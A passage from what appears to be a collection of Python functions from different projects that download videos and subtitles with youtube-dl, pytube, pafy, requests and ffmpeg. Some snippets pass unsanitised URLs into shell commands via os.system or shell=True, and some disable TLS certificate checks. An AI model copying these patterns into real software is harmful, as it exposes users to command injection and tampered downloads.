edx_get_subtitle(sub_urls[i], headers)\n if subs_string:\n print('[info] Writing edX subtitles: %s' % sub_path)\n open(os.path.join(os.getcwd(), sub_path),\n 'wb+').write(subs_string.encode('utf-8'))\n\n if handout_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(handout_path):\n handout_content = urlopen(BASE_URL+handout_urls[i]).read()\n if handout_content:\n print('[info] Writing handout: %s' % handout_path)\n open(os.path.join(os.getcwd(), handout_path),\n 'wb+').write(handout_content)\n #srtfile = urlopen(BASE_URL+sub_urls[i])\n #output = open(srt_path,'wb')\n #output.write(srtfile.read())\n #output.close()", "async def download_video(v_url):\n reply = await v_url.get_reply_message()\n if v_url.pattern_match.group(2) != \"\":\n url = v_url.pattern_match.group(2)\n elif reply is not None:\n url = reply.message\n url = re.findall(r\"\\bhttps?://.*\\.\\S+\", reply.message)[0]\n else:\n return\n type = (\n v_url.pattern_match.group(1).lower()\n if v_url.pattern_match.group(1) is not None\n else \"a\"\n )\n await v_url.edit(\"`Preparing to download...`\")\n out_folder = Config.TMP_DOWNLOAD_DIRECTORY + \"youtubedl/\"\n Config.TMP_DOWNLOAD_DIRECTORY + \"/thumb_image.jpg\"\n if not os.path.isdir(out_folder):\n os.makedirs(out_folder)\n if type == \"a\":\n opts = {\n \"format\": \"bestaudio\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"key\": \"FFmpegMetadata\",\n \"writethumbnail\": True,\n \"embedthumbnail\": True,\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\n \"key\": \"FFmpegExtractAudio\",\n \"preferredcodec\": \"mp3\",\n \"preferredquality\": \"320\",\n }\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"quiet\": True,\n \"logtostderr\": False,\n }\n video = False\n song = True\n\n elif type == \"v\":\n opts = {\n \"format\": \"best\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"getthumbnail\": True,\n \"embedthumbnail\": True,\n \"xattrs\": True,\n \"writethumbnail\": True,\n \"key\": \"FFmpegMetadata\",\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\"key\": \"FFmpegVideoConvertor\", \"preferedformat\": \"mp4\"},\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"logtostderr\": False,\n \"quiet\": True,\n }\n song = False\n video = True\n\n try:\n await v_url.edit(\"`Fetching playlist data, please wait..`\")\n with YoutubeDL(opts) as ytdl:\n ytdl.extract_info(url)\n # print(ytdl_data['thumbnail'])\n filename = sorted(get_lst_of_files(out_folder, []))\n except DownloadError as DE:\n await v_url.edit(f\"`{str(DE)}`\")\n return\n except ContentTooShortError:\n await v_url.edit(\"`The download content was too short.`\")\n return\n except GeoRestrictedError:\n await v_url.edit(\n \"`Video is not available from your geographic location due to geographic restrictions imposed by a website.`\"\n )\n return\n except MaxDownloadsReached:\n await v_url.edit(\"`Max-downloads limit has been reached.`\")\n return\n except PostProcessingError:\n await v_url.edit(\"`There was an error during post processing.`\")\n return\n except UnavailableVideoError:\n await v_url.edit(\"`Media is not available in the requested format.`\")\n return\n except XAttrMetadataError as XAME:\n await v_url.edit(f\"`{XAME.code}: {XAME.msg}\\n{XAME.reason}`\")\n return\n except ExtractorError:\n await v_url.edit(\"`There was an error during info extraction.`\")\n return\n except Exception as e:\n await v_url.edit(f\"{str(type(e)): {str(e)}}\")\n return\n c_time = time.time()\n await v_url.edit(\"`YouTube Playlist Downloading Processing Now.\\nPlease Wait!`\")\n if song:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = True\n supports_streaming = False\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 180\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n try:\n ytdl_data_name_audio = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_audio[: (len(ytdl_data_name_audio) - 4)]\n + \".jpg\"\n )\n print(ytdl_data_name_audio)\n file_path = single_file\n song_size = file_size(file_path)\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_audio}`\"\n + \"\\n\"\n + f\"Size👉 {song_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n allow_cache=False,\n thumb=thumb,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_audio}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)\n if video:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = False\n supports_streaming = True\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 0\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n # print(ytdl_data)\n # for file in os.listdir(\"./DOWNLOADS/youtubedl/\"):\n # if file.endswith(\".jpg\"):\n # thumb = \"./DOWNLOADS/youtubedl/\" + file\n # print(os.path.join(\"./DOWNLOADS/youtubedl/\", file))\n # image_link = ytdl_data['thumbnail']\n # downloaded_image = wget.download(image_link,out_folder)\n # thumb = ytdl_data_name_video + \".jpg\"\n file_path = single_file\n video_size = file_size(file_path)\n try:\n ytdl_data_name_video = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_video[: (len(ytdl_data_name_video) - 4)]\n + \".jpg\"\n )\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_video}`\"\n + \"\\n\"\n + f\"Size👉 {video_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n thumb=thumb,\n allow_cache=False,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_video}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)", "async def download_video(event):\n url = event.pattern_match.group(1)\n rmsg = await event.get_reply_message()\n if not url and rmsg:\n myString = rmsg.text\n url = re.search(\"(?P<url>https?://[^\\s]+)\", myString).group(\"url\")\n if not url:\n return await edit_or_reply(event, \"What I am Supposed to find? Give link\")\n codevent = await edit_or_reply(event, \"`Preparing to download...`\")\n reply_to_id = await reply_id(event)\n ytdl_data = await ytdl_down(codevent, video_opts, url)\n if ytdl_down is None:\n return\n f = pathlib.Path(f\"{ytdl_data['title']}.mp4\".replace(\"|\", \"_\"))\n codthumb = pathlib.Path(f\"{ytdl_data['title']}.jpg\".replace(\"|\", \"_\"))\n if not os.path.exists(codthumb):\n codthumb = pathlib.Path(f\"{ytdl_data['title']}.webp\".replace(\"|\", \"_\"))\n if not os.path.exists(codthumb):\n codthumb = None\n await codevent.edit(\n f\"`Preparing to upload video:`\\\n \\n**{ytdl_data['title']}**\\\n \\nby *{ytdl_data['uploader']}*\"\n )\n ul = io.open(f, \"rb\")\n c_time = time.time()\n attributes, mime_type = await fix_attributes(f, ytdl_data, supports_streaming=True)\n uploaded = await event.client.fast_upload_file(\n file=ul,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(d, t, codevent, c_time, \"upload\", file_name=f)\n ),\n )\n ul.close()\n media = types.InputMediaUploadedDocument(\n file=uploaded,\n mime_type=mime_type,\n attributes=attributes,\n thumb=await event.client.upload_file(codthumb) if codthumb else None,\n )\n await event.client.send_file(\n event.chat_id,\n file=media,\n reply_to=reply_to_id,\n caption=ytdl_data[\"title\"],\n )\n os.remove(f)\n if codthumb:\n os.remove(codthumb)\n await event.delete()", "def download(idd, path):\n print(f'[{script}]: Downloading YT video \"{idd}\"...') if verbosity >= 1 else None\n\n try:\n yt = pytube.YouTube(\"https://www.youtube.com/watch?v=\" + idd)\n stream = yt.streams.filter(progressive=True).first()\n stream.download(path, filename=idd)\n except Exception:\n print(f'[{script}]: Failed download of YT video \"{idd}\".')\n return None\n\n data = {\n \"idd\": idd,\n \"abr\": stream.abr,\n \"acodec\": stream.audio_codec,\n \"bitrate\": stream.bitrate,\n \"codecs\": stream.codecs,\n \"fps\": stream.fps,\n \"mime\": stream.mime_type,\n \"res\": stream.resolution,\n \"vcodec\": stream.video_codec,\n \"size\": stream._filesize,\n \"frames\": stream.fps * yt.length,\n }\n\n file_path = path + \"/\" + data[\"idd\"] + \".mp4\"\n print(\n f'[{script}]: Download successful. Saved to \"{file_path}\".'\n ) if verbosity >= 2 else None\n return data", "def download(dltype, num):\n # This function needs refactoring!\n # pylint: disable=R0912\n # pylint: disable=R0914\n if g.browse_mode == \"ytpl\" and dltype in (\"da\", \"dv\"):\n plid = g.ytpls[int(num) - 1][\"link\"]\n down_plist(dltype, plid)\n return\n\n elif g.browse_mode == \"ytpl\":\n g.message = \"Use da or dv to specify audio / video playlist download\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n elif g.browse_mode != \"normal\":\n g.message = \"Download must refer to a specific video item\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n writestatus(\"Fetching video info...\")\n song = (g.model.songs[int(num) - 1])\n best = dltype.startswith(\"dv\") or dltype.startswith(\"da\")\n\n if not best:\n\n try:\n # user prompt for download stream\n url, ext, url_au, ext_au = prompt_dl(song)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download aborted!\" + c.w\n g.content = generate_songlist_display()\n return\n\n if not url or ext_au == \"abort\":\n # abort on invalid stream selection\n g.content = generate_songlist_display()\n g.message = \"%sNo download selected / invalid input%s\" % (c.y, c.w)\n return\n\n else:\n # download user selected stream(s)\n filename = _make_fname(song, ext)\n args = (song, filename, url)\n\n if url_au and ext_au:\n # downloading video and audio stream for muxing\n audio = False\n filename_au = _make_fname(song, ext_au)\n args_au = (song, filename_au, url_au)\n\n else:\n audio = ext in (\"m4a\", \"ogg\")\n\n kwargs = dict(audio=audio)\n\n elif best:\n # set updownload without prompt\n url_au = None\n av = \"audio\" if dltype.startswith(\"da\") else \"video\"\n audio = av == \"audio\"\n filename = _make_fname(song, None, av=av)\n args = (song, filename)\n kwargs = dict(url=None, audio=audio)\n\n try:\n # perform download(s)\n dl_filenames = [args[1]]\n f = _download(*args, **kwargs)\n if f:\n g.message = \"Saved to \" + c.g + f + c.w\n\n if url_au:\n dl_filenames += [args_au[1]]\n _download(*args_au, allow_transcode=False, **kwargs)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download halted!\" + c.w\n\n try:\n for downloaded in dl_filenames:\n os.remove(downloaded)\n\n except IOError:\n pass\n\n if url_au:\n # multiplex\n mux_cmd = \"APP -i VIDEO -i AUDIO -c copy OUTPUT\".split()\n mux_cmd = \"%s -i %s -i %s -c copy %s\"\n mux_cmd = [g.muxapp, \"-i\", args[1], \"-i\", args_au[1], \"-c\",\n \"copy\", args[1][:-3] + \"mp4\"]\n\n try:\n subprocess.call(mux_cmd)\n g.message = \"Saved to :\" + c.g + mux_cmd[7] + c.w\n os.remove(args[1])\n os.remove(args_au[1])\n\n except KeyboardInterrupt:\n g.message = \"Audio/Video multiplex aborted!\"\n\n g.content = generate_songlist_display()", "def do_downloads(filename1=\"og\", filename2=\"lyrical\", video_id=DEFALT_VIDEO_ID):\n original_video_url = youtube_id_to_url(video_id)\n download_from_url(original_video_url, filename1)\n lyrics_video_url = get_lyrics_url(original_video_url)\n download_from_url(lyrics_video_url, filename2)\n\n return filename1, filename2", "def download_vid(vid_link, quality_num=None):\r\n if quality_num is not None:\r\n # if quality_num provided\r\n try:\r\n os.system(\"youtube-dl -f \"+str(quality_num)+\" \\'\"+str(vid_link)+\"\\'\")\r\n except Exception:\r\n print(Exception)\r\n else:\r\n # by default the best quality is downloaded\r\n try:\r\n os.system(\"youtube-dl \"+str(vid_link))\r\n except Exception:\r\n print(Exception)", "def download_wrapper(youtube_id, output_dir):\n # we do this to align with names in annotations\n output_filename = os.path.join(output_dir, youtube_id + '.mp4')\n if os.path.exists(output_filename):\n status = tuple([youtube_id, True, 'Exists'])\n return status\n\n downloaded, log = download(youtube_id, output_filename)\n status = tuple([youtube_id, downloaded, log])\n return status", "def youtube_download_by_id(id, title=None, output_dir='.', merge=True, info_only=False):\n \n raw_video_info = get_content('http://www.youtube.com/get_video_info?video_id=%s' % id)\n video_info = parse.parse_qs(raw_video_info)\n \n if video_info['status'] == ['ok'] and ('use_cipher_signature' not in video_info or video_info['use_cipher_signature'] == ['False']):\n title = parse.unquote_plus(video_info['title'][0])\n stream_list = parse.parse_qs(raw_video_info)['url_encoded_fmt_stream_map'][0].split(',')\n \n else:\n # Parse video page when video_info is not usable.\n video_page = get_content('http://www.youtube.com/watch?v=%s' % id)\n ytplayer_config = json.loads(match1(video_page, r'ytplayer.config\\s*=\\s*([^\\n]+);'))\n \n title = ytplayer_config['args']['title']\n stream_list = ytplayer_config['args']['url_encoded_fmt_stream_map'].split(',')\n \n streams = {\n parse.parse_qs(stream)['itag'][0] : parse.parse_qs(stream)\n for stream in stream_list\n }\n \n for codec in yt_codecs:\n itag = str(codec['itag'])\n if itag in streams:\n download_stream = streams[itag]\n break\n \n url = download_stream['url'][0]\n if 'sig' in download_stream:\n sig = download_stream['sig'][0]\n else:\n sig = decrypt_signature(download_stream['s'][0])\n url = '%s&signature=%s' % (url, sig)\n \n type, ext, size = url_info(url)\n \n print_info(site_info, title, type, size)\n if not info_only:\n download_urls([url], title, ext, size, output_dir, merge = merge)", "def download_video(video_stream):\n global file_size\n file_size = size_in_mb(video_stream.filesize)\n home_dir = os.environ['HOME']\n path = f'{home_dir}/Downloads/Video'\n print('-'*60)\n print(f'Filename:\\t{video_stream.title}')\n print(f'Location:\\t{path}')\n print(f'Size:\\t\\t{file_size} MB\\n')\n\n filename = video_stream.title + '_video.mp4'\n filename = filename.replace('/', ' ')\n filename = filename.replace('\\\\', ' ')\n\n if os.path.exists(os.path.join(path, filename)):\n print(\"The file has been already downloaded.\")\n sys.exit()\n \n video_stream.download(path, filename)", "def download_video(url, fn):\n start_time = time.time()\n\n # Sorry: This is terrible code, but I'm kind of throwing it\n # together as I discover more about it.\n print ' Downloading {0} to {1}'.format(url, fn)\n\n resp = requests.get(url)\n if resp.status_code != 200:\n print ' GAH! MY EYES! {0} kicked up {1}'.format(url, resp.status_code)\n return\n\n rss_url_m = re.search(r'\"(/rss/flash/\\d+)\"', resp.content)\n rss_url = 'http://blip.tv' + rss_url_m.group(0).strip('\"')\n resp = requests.get(rss_url)\n\n rss_content = resp.content\n\n for ending in POSSIBLE_ENDINGS:\n regex = r'\"http://blip.tv[^\"]+?' + ending + '\"'\n\n download_m = re.search(regex, rss_content)\n if not download_m:\n print ' No {0} url found'.format(ending)\n continue\n\n download_url = download_m.group(0).strip('\"')\n print ' Attempting to download {0}'.format(download_url)\n\n try:\n resp = requests.get(download_url, stream=True)\n print ' Downloading {0}'.format(download_url)\n if resp.status_code == 200:\n total_length = int(resp.headers['content-length'])\n\n if os.path.exists(fn + ending) and file_size(fn + ending) == total_length:\n print ' Already downloaded.'\n return\n\n with open(fn + ending, 'w') as fp:\n total_downloaded = 0\n\n tic_chunk = total_downloaded\n tic = time.time()\n for chunk in resp.iter_content(chunk_size=1024):\n if chunk:\n fp.write(chunk)\n fp.flush()\n tic_chunk += len(chunk)\n total_downloaded += len(chunk)\n\n if time.time() - tic > 1:\n with TERM.location(x=0):\n line = ' {0} {1}kbps'.format(\n format_downloaded(total_downloaded, total_length),\n int(tic_chunk / (time.time() - tic) / 1000))\n sys.stdout.write(line + TERM.clear_eol)\n sys.stdout.flush()\n tic_chunk = 0\n tic = time.time()\n print ''\n\n print ' Done! {0} {1}mb {2}'.format(\n fn + ending,\n int(total_length / 1000000.0),\n format_duration(time.time() - start_time))\n return\n\n else:\n print ' HTTP{0}! GAH! SPUTTER!'.format(resp.status_code)\n\n except requests.exceptions.ConnectionError as exc:\n print ' CONNECTIONERROR! GAH! SPUTTER! {0}'.format(exc)\n\n print ' SO MANY FAILURES!'\n raise NoDownloadMeNoLikeyException()", "def download_video(video_url, output_path, output_name=\"\", default_type=\"mp4\", verbose=False):\n try:\n if \".\" not in output_name:\n output_name = f\"{output_name}.{default_type}\"\n output_path = os.path.join(output_path, output_name)\n api_response = core.get_request_with_retries(video_url)\n core_utils.print_if_verbose('Processing...', verbose)\n f = open(output_path, 'wb')\n for chunk in api_response.iter_content(chunk_size=255):\n # filter out keep-alive new chunks\n if chunk:\n f.write(chunk)\n core_utils.print_if_verbose(f'The video has been exported here: {output_path}', verbose)\n f.close()\n except Exception as exception_msg:\n print(f\"The video could not be downloaded due to the following error: {exception_msg}\")\n return", "def download_all(self):\r\n download_path = os.path.join(self.download_path, self.username)\r\n already_downloaded = []\r\n successful_downloads = []\r\n failed_downloads = []\r\n if not os.path.exists(download_path):\r\n os.makedirs(download_path)\r\n elif not os.path.isdir(download_path):\r\n raise NotADirectoryError(\"Download path is not a directory: \" + download_path)\r\n elif self.skip_downloaded:\r\n for item in os.listdir(download_path):\r\n file_path = str(os.path.join(download_path, item))\r\n if os.path.isfile(file_path):\r\n parsed_file = self._parse_file_name(os.path.basename(file_path))\r\n if parsed_file is not None:\r\n already_downloaded.append(parsed_file[\"id\"])\r\n for index, item in enumerate(self.videos):\r\n # Don't download it if the user has set that option, and the tiktok already exists on the disk\r\n if item[\"id\"] in already_downloaded:\r\n logger.info(\"Already downloaded video with id: \" + item[\"id\"])\r\n continue\r\n file_name = self._format_file_name(item[\"createTime\"], item[\"id\"])\r\n file_path = os.path.join(download_path, file_name)\r\n logger.info(\"Downloading video: \" + file_name + \" (\" + str(index + 1) + \"/\" + str(len(self.videos)) + \")\")\r\n video_url = self._format_video_url(item)\r\n success = self.download_video(file_path, video_url, item[\"createTime\"])\r\n if success:\r\n successful_downloads.append(video_url)\r\n else:\r\n failed_downloads.append(video_url)\r\n sleep_time = random.uniform(self.sleep_min, self.sleep_max)\r\n logger.info(\"Sleeping for: \" + str(sleep_time) + \" seconds\")\r\n sleep(sleep_time)\r\n logger.info(\"Processed all {} videos\".format(self.video_count))\r\n logger.debug(\"Fallback counter: \" + str(self.fallback_counter))\r\n logger.debug(\"YouTube-dl DownloadError counter: \" + str(self.fallback_counter))\r\n logger.debug(\"Other error counter: \" + str(self.other_error_counter))\r\n return {\"successful_downloads\": successful_downloads,\r\n \"failed_downloads\": failed_downloads,\r\n \"skipped_downloads\": already_downloaded}", "def download_clip(row, label_to_dir, trim, trimmed_label_to_dir, count):\n\n label = row['label']\n filename = row['youtube_id']\n time_start = row['time_start']\n time_end = row['time_end']\n\n # if trim, save full video to tmp folder\n output_path = label_to_dir['tmp'] if trim else label_to_dir[label]\n\n ydl_opts = {\n 'format': 'bestvideo[ext=mp4][filesize <? 50M]',\n }\n \n # Don't download if the video has already been trimmed\n has_trim = False\n if trim:\n start = str(time_start)\n end = str(time_end - time_start)\n output_filename = os.path.join(trimmed_label_to_dir[label],\n filename + '_{}_{}'.format(start, end) + VIDEO_EXTENSION)\n\n has_trim = os.path.exists(output_filename)\n\n # Don't download if already exists\n if not os.path.exists(os.path.join(output_path, filename + VIDEO_EXTENSION)) and not has_trim:\n print('Start downloading: ', filename) \n ydl_opts['outtmpl'] = os.path.join(output_path, '%(id)s.%(ext)s')\n \n try:\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([URL_BASE + filename])\n except YoutubeDLError as e:\n print('Download failed for ' + filename)\n log.warning(filename)\n return False\n\n print('Finish downloading: ', filename)\n else:\n print('Already downloaded: ', filename)\n\n if trim:\n # Take video from tmp folder and put trimmed to final destination folder\n # better write full path to video\n\n\n input_filename = os.path.join(output_path, filename + VIDEO_EXTENSION)\n\n if has_trim:\n print('Already trimmed: ', filename)\n else:\n print('Start trimming: ', filename)\n # Construct command to trim the videos (ffmpeg required).\n command = 'ffmpeg -i \"{input_filename}\" ' \\\n '-ss {time_start} ' \\\n '-t {time_end} ' \\\n '-c:v libx264 -c:a copy -threads 1 -y -nostdin ' \\\n '\"{output_filename}\"'.format(\n input_filename=input_filename,\n time_start=start,\n time_end=end,\n output_filename=output_filename\n )\n try:\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n print('Error while trimming: ', filename)\n log.warning(filename)\n return False\n print('Finish trimming: ', filename)\n\n print('Processed %i out of %i' % (count + 1, TOTAL_VIDEOS))", "def downloadvideo(filename):\n url = \"http://openings.moe/video/\" + filename\n f = getfile(url)\n safeprint(Colors.PURPLE + url + Colors.END + \":\\nSaving to --> \" + Colors.YELLOW + filename + Colors.END)\n with open(os.path.basename(url), \"wb\") as local_file:\n try:\n local_file.write(f.read())\n except IOError as e:\n safeprint(\"An error occurred while saving the file, try again. \" + str(e))", "def download_video(self, url):\n yt = YouTube(url)\n yt_filtered = yt.streams.filter(progressive=True, file_extension=\"mp4\")\n yt_resolutions = yt_filtered.order_by(\"resolution\")\n\n # Downloads the first video that fits the description\n video = yt_resolutions.desc().first()\n video.download()\n\n # Returns the filename\n return video.default_filename", "def download_ostrich_video(download_to_path):\n urlretrieve(REMOTE_OSTRICH_VID_PATH, download_to_path)", "def download_interval(interval_list):\n start = ['start', 'begin', 'beginning', 'head', 'first']\n end = ['slut', 'end', 'tail', 'finish',\n 'finito', 'fin', 'done', 'finished']\n\n # Iterate over the list\n for link in range(len(interval_list)):\n try:\n video = pafy.new(interval_list[link][0], ydl_opts={\n 'nocheckcertificate': True, \"noplaylist\": True})\n # Only downloads the video if the video hasn't been downloaded before\n if not os.path.exists(os.path.join(\"tmp\", f\"{video.title}.mp4\")):\n video_s = video.getbestvideo()\n # TODO: add a way to get the second best stream (third etc.) when an error occurs using Pafy.videostreams and going through the list\n video_a = video.getbestaudio()\n\n # Checks if the end point is a string\n if interval_list[link][1][1].lower() in end:\n # Where is the stream, where should we start, how long should it run\n mp4_vid = ffmpeg.input(\n video_s.url, ss=interval_list[link][1][0], t=video.duration)\n mp4_aud = ffmpeg.input(\n video_a.url, ss=interval_list[link][1][0], t=video.duration)\n else:\n # Where is the stream, where should we start, how long should it run\n mp4_vid = ffmpeg.input(\n video_s.url, ss=interval_list[link][1][0], t=interval_list[link][1][1])\n mp4_aud = ffmpeg.input(\n video_a.url, ss=interval_list[link][1][0], t=interval_list[link][1][1])\n\n # Do the processing\n try:\n (\n ffmpeg\n .concat(\n # Specify what you want from the streams (v for video and a for audio)\n mp4_vid['v'],\n mp4_aud['a'],\n # One video stream and one audio stream\n v=1,\n a=1\n )\n # Output is title of video with mp4 ending\n .output(os.path.join(\"tmp\", f'{video.title}.mp4'))\n .run()\n )\n except TypeError as e:\n print(f\"An error occurred e 0: {e}\")\n except ffmpeg._run.Error as e:\n print(f\"An error occurred e 1: {e}\")\n except Exception as e:\n print(f\"I couldn't download {interval_list[link]} due to: {e}\")", "def download_skateline_video(download_to_path=None):\n urlretrieve(REMOTE_SKATELINE_VID_PATH, download_to_path)", "def youtube_download(url, output_dir='.', merge=True, info_only=False):\n \n id = match1(url, r'youtu.be/([^/]+)') or parse_query_param(url, 'v')\n assert id\n \n youtube_download_by_id(id, title=None, output_dir=output_dir, merge=merge, info_only=info_only)", "def download(video, save_dir, vid):\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n print(\"--> downloading {}\".format(video.title))\n\n best = video.getbest(preftype=\"mp4\")\n filename = best.download(\n filepath=os.path.join(save_dir,\n \"{}.{}\".format(vid, best.extension)))\n print(\"--> saved to {}\".format(filename))\n\n return os.path.join(save_dir, \"{}.{}\".format(vid, best.extension))", "def test_task_video_download(url_to_video: str, empty_video_resource: VideoResource):\n download_video(url_to_video, empty_video_resource.id)\n empty_video_resource.refresh_from_db()\n video_instance = empty_video_resource.videos.filter(primary=True).first()\n\n assert empty_video_resource.videos.all()\n assert video_instance.extension == 'mp4'\n assert video_instance.primary\n for item in video_instance.video.open():\n assert item", "def _download_file(self, video_objects):\n downloaded_video = []\n path=\"media/\"\n for video_object in video_objects:\n if 'contentUrl' in video_object.keys() and video_object['contentUrl']!='':\n \n url = video_object['contentUrl']\n filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n \n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n path+=filename\n return path", "def download(video_identifier,\n output_filename,\n num_attempts=5,\n url_base='https://www.youtube.com/watch?v='):\n # Defensive argument checking.\n assert isinstance(video_identifier, str), 'video_identifier must be string'\n assert isinstance(output_filename, str), 'output_filename must be string'\n assert len(video_identifier) == 11, 'video_identifier must have length 11'\n\n status = False\n\n if not os.path.exists(output_filename):\n command = [\n 'youtube-dl', '--quiet', '--no-warnings', '--no-check-certificate',\n '-f', 'mp4', '-o',\n '\"%s\"' % output_filename,\n '\"%s\"' % (url_base + video_identifier)\n ]\n command = ' '.join(command)\n print(command)\n attempts = 0\n while True:\n try:\n subprocess.check_output(\n command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError:\n attempts += 1\n if attempts == num_attempts:\n return status, 'Fail'\n else:\n break\n # Check if the video was successfully saved.\n status = os.path.exists(output_filename)\n return status, 'Downloaded'", "def download_truncated_ostrich_video(download_to_path=None):\n urlretrieve(REMOTE_TRUNCATED_OSTRICH_VID_PATH, download_to_path)", "def download_video(self, file_path, video_url, video_creation_time):\r\n logger.debug(\"Downloading video created at \" + _format_timestamp_iso(self.tz, video_creation_time) + \" from \"\r\n + video_url + \" to \" + file_path)\r\n failed = False\r\n try:\r\n self._download_with_api(file_path, video_url)\r\n except Exception as e:\r\n logger.debug(\"Video download failed using TikTokApi: \" + str(e))\r\n failed = True\r\n if not os.path.isfile(file_path):\r\n failed = True\r\n logger.debug(\"No file was created by TikTokApi at \" + file_path)\r\n elif os.stat(file_path).st_size < 1024:\r\n failed = True\r\n try:\r\n os.remove(file_path)\r\n logger.debug(\"Deleted malformed TikTokApi download at \" + file_path)\r\n except Exception as ee:\r\n logger.error(\"Unable to delete malformed TikTokApi download at \" + str(ee))\r\n if failed:\r\n sleep_time = random.uniform(self.sleep_min, self.sleep_max)\r\n logger.info(\"Sleeping for: \" + str(sleep_time) + \" seconds\")\r\n sleep(sleep_time)\r\n try:\r\n logger.debug(\"Falling back to YouTube-dl\")\r\n self.fallback_counter += 1\r\n self._download_with_ytdl(file_path, video_url)\r\n if not os.path.isfile(file_path):\r\n raise AssertionError(\"No file was created by YouTube-dl at \" + file_path)\r\n elif os.stat(file_path).st_size < 1024:\r\n try:\r\n os.remove(file_path)\r\n logger.debug(\"Deleted malformed YouTube-dl download at \" + file_path)\r\n except Exception as ee:\r\n raise AssertionError(\"Malformed file was created at \" + file_path +\r\n \" and could not be removed: \" + str(ee))\r\n raise AssertionError(\"Malformed file was created at \" + file_path + \" and was removed\")\r\n failed = False\r\n except youtube_dl.utils.DownloadError as ee:\r\n logger.error(\"YouTube-dl DownloadError: \" + str(ee))\r\n self.ytdl_downloaderror_counter += 1\r\n failed = True\r\n except Exception as ee:\r\n logger.error(\"Video download failed with YouTube-dl: \" + str(ee))\r\n self.other_error_counter += 1\r\n failed = True\r\n if not failed:\r\n try:\r\n os.utime(file_path, (video_creation_time, video_creation_time))\r\n except Exception as e:\r\n logger.debug(\"Unable to set utime of \" + str(video_creation_time) + \" on file \" + file_path +\r\n \", Error: \" + str(e))\r\n return True\r\n return False", "def download_inward_video_url(self, download_inward_video_url):\n\n self._download_inward_video_url = download_inward_video_url", "def download_tracked_inward_video_url(self, download_tracked_inward_video_url):\n\n self._download_tracked_inward_video_url = download_tracked_inward_video_url", "def download(pattern):\n query = pattern.lower()\n videolist = getvideolist()\n filename = []\n for video in videolist:\n for value in video.values():\n if query in str(value).lower():\n filename.append(video[\"file\"])\n if filename:\n for name in filename:\n downloadvideo(name)\n else:\n safeprint(\"No video matching the given query was found.\")", "def download(self, url=None):\n if url is None:\n if self.results is None:\n raise ValueError(\"Please specify a valid url.\")\n else:\n url = self.results[0]\n try:\n meta = pafy.new(url)\n except Exception:\n raise IOError(\"Video not available for download.\")\n\n vid = meta.getbest()\n path = vid.download()\n self.videos.append(path)\n return path", "def download_videos(data, category):\n # file_ids = get_existing_file_ids()\n\n # Sorry: This is gross.\n directory = os.path.abspath('./' + slugify(category))\n if not os.path.exists(directory):\n os.mkdir(directory)\n\n print 'Saving files to {0}'.format(directory)\n\n start_time = time.time()\n failed_videos = []\n\n for line in data[category]:\n print ''\n print 'Working on {0} - {1}'.format(line[0], line[2])\n\n # if line[0] in file_ids:\n # print ' Skipping -- already got it'\n # continue\n\n fn = '{0}_{1}'.format(line[0], 